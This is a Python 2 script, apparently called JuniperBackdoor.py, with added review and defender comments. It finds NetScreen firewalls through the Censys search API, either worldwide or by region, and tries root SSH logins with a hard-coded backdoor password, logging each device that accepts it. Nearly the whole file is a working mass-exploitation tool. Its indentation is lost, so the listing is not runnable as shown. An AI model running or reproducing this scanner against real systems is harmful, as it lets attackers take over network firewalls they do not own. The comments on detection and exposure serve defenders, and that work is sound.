from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math
# Fixed credentials that connectSSH() is called with for every candidate host.
user = "root"
# Hard-coded password, shaped like a printf format string so that it resembles
# an ordinary debug string. Presumably the publicly disclosed ScreenOS
# authentication-bypass password (the script is named JuniperBackdoor and
# searches for NetScreen SSH banners) - confirm against the vendor advisory.
# Affected devices need the vendor's fixed firmware, and management SSH should
# not be reachable from untrusted networks.
passwd = "<<< %s(un='%s') = %u"
# Censys search API base URL and account credentials. The two credential values
# are placeholders; real ones belong outside source control.
API_URL = "https://www.censys.io/api/v1"
API_ID = "YOUR API ID"
SECRET = "YOUR SECRET"
# Highest result page the main loop will request (it checks cur_page <= PAGES).
PAGES = 50
# Result page number passed to getIp(); incremented by the main loop.
cur_page = 1
# Number of testTarget worker threads started by test().
thread_num = 20
# Count of workers that have found the queue empty and stopped.
over_num = 0
# Shared work queue of candidate IPs: filled by getIp(), drained by the workers.
queue = Queue()
# Results file listing hosts that accepted the login. Opened in "w" mode (so
# truncated) when the module is loaded; closed by a worker once over_num
# reaches thread_num.
ip_OK = open("ip_OK.txt", "w")
# Worker thread. Takes IP addresses from the shared module-level queue and, for
# each one, attempts an SSH login as `user` with the fixed `passwd` through
# connectSSH(). Hosts whose pre-prompt output contains
# 'Remote Management Console' are printed as "is vul" and appended to ip_OK.
# NOTE(review): this listing has lost its indentation, so the nesting described
# in the comments below is inferred from statement order - confirm against the
# upstream file before relying on it.
# Defender's view: a probed device sees one SSH password login for "root" and,
# if the login is accepted, an immediate logout. Unexpected admin SSH sessions
# from unknown addresses on a firewall's management interface are worth
# alerting on.
class testTarget(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
# Thread body: keep dequeuing IPs until the queue is found empty.
def run(self):
global queue
global ip_OK
global over_num
global thread_num
is_over = False
while not is_over:
for i in range(5):
if not queue.empty():
ip = queue.get()
else:
# Queue empty: mark this worker finished and count it in the shared
# over_num counter (a plain global, updated without a lock).
is_over = True
over_num += 1
# When the counter equals thread_num, close the results file. sys.exit()
# raises SystemExit in the thread that calls it.
if over_num == thread_num:
ip_OK.close()
sys.exit()
break
# One login attempt per dequeued IP, using the module-level credentials.
theSSH = connectSSH(ip, user, passwd)
if theSSH:
# pexpect keeps the text received before the matched prompt in `.before`.
before = theSSH.before
# Best-effort logout; any error raised here is ignored.
try:
theSSH.logout()
except:
pass
# Success test: this string (presumably the device's console banner) appears
# in the text captured after login.
isval = re.search('Remote Management Console', before)
if isval:
print "%s is vul" % ip
# Record the host and flush so the entry reaches disk straight away.
ip_OK.write("%s\n" % ip)
ip_OK.flush()
else:
print "%s is not vul" % ip
# One-second pause in the worker loop.
time.sleep(1)
# Attempt an SSH password login to `host` as `user` with `passwd` using pxssh.
# Returns the logged-in pxssh session on success. On any Exception it prints
# "<host> is not vul" and falls through, so the caller receives None; that
# covers connection failures as well as rejected logins, which are therefore
# reported identically.
def connectSSH(host, user, passwd):
try:
ssh = pxssh.pxssh()
# auto_prompt_reset=False: pxssh does not try to change the remote shell
# prompt after login.
ssh.login(host, user, passwd, auto_prompt_reset=False)
return ssh
except Exception, e:
print "%s is not vul" % host
# Fetch one page of search results and enqueue the returned IP addresses.
#   query - search expression sent to the API
#   page  - result page number to request
# Returns nothing; results are pushed onto the module-level queue.
# NOTE(review): the try/except/else nesting described below is inferred from
# statement order, because this listing has lost its indentation.
def getIp(query, page):
# Assigned but not read again inside this function.
start_time = time.time()
# Request body: only the "ip" field is asked for.
data = {
"query": query,
"page": page,
"fields": ["ip"]
}
# POST the JSON body to <API_URL>/search/ipv4; the (API_ID, SECRET) tuple is
# sent by requests as HTTP basic auth. Any exception is silently ignored and
# the function then returns without enqueuing anything.
try:
res = requests.post(
API_URL + "/search/ipv4", data=json.dumps(data), auth=(
API_ID, SECRET))
except:
pass
else:
# A response body that is not valid JSON is likewise ignored.
try:
results = res.json()
except:
pass
else:
# A non-200 status prints the API's "error" field and exits with status 1.
if res.status_code != 200:
print "error occurred: %s" % results["error"]
sys.exit(1)
else:
# Queue the "ip" value of every entry in the "results" list.
result_iter = iter(results["results"])
for result in result_iter:
queue.put(result["ip"])
def test():
    """Create and start ``thread_num`` testTarget worker threads.

    Each worker is started immediately after construction; the threads are
    not joined here and no reference to them is kept.
    """
    for _worker_index in range(thread_num):
        testTarget().start()
# Script entry point. Expects exactly one argument: "ALL" or a region name.
# It builds the search query, requests result page cur_page, starts the
# workers if anything was queued, and then keeps requesting pages while the
# queue is non-empty.
# NOTE(review): the nesting described here is inferred from statement order,
# because this listing has lost its indentation.
# Defender's view: every query selects hosts by the software version shown in
# their port-22 SSH banner, so presumably only management interfaces reachable
# from the internet are returned. Keeping firewall management services off
# untrusted networks removes a device from this kind of search.
if __name__ == '__main__':
# Wrong argument count: print the usage text and exit.
if len(sys.argv) != 2:
print """
usage:
using python JuniperBackdoor.py [region] to scan the hosts
in the region you set
using python JuniperBackdoor.py ALL to scan the hole world
"""
sys.exit()
else:
region = sys.argv[1]
# "ALL" applies no location filter; "china" filters on location.country; any
# other value is used as a location.province filter. The region text is
# inserted into the query unchanged.
if region == "ALL":
query = "22.ssh.banner.software_version:NetScreen"
elif region == "china":
query = "22.ssh.banner.software_version:NetScreen AND \
location.country:%s" % region
else:
query = "22.ssh.banner.software_version:NetScreen AND \
location.province:%s" % region
# Request the first page, then start the workers only if it produced entries.
getIp(query, cur_page)
if not queue.empty():
test()
# While entries remain queued, request a page as long as cur_page <= PAGES,
# then advance cur_page and pause 0.1 s.
while queue.qsize() > 0:
if cur_page <= PAGES:
getIp(query, cur_page)
cur_page += 1
time.sleep(0.1)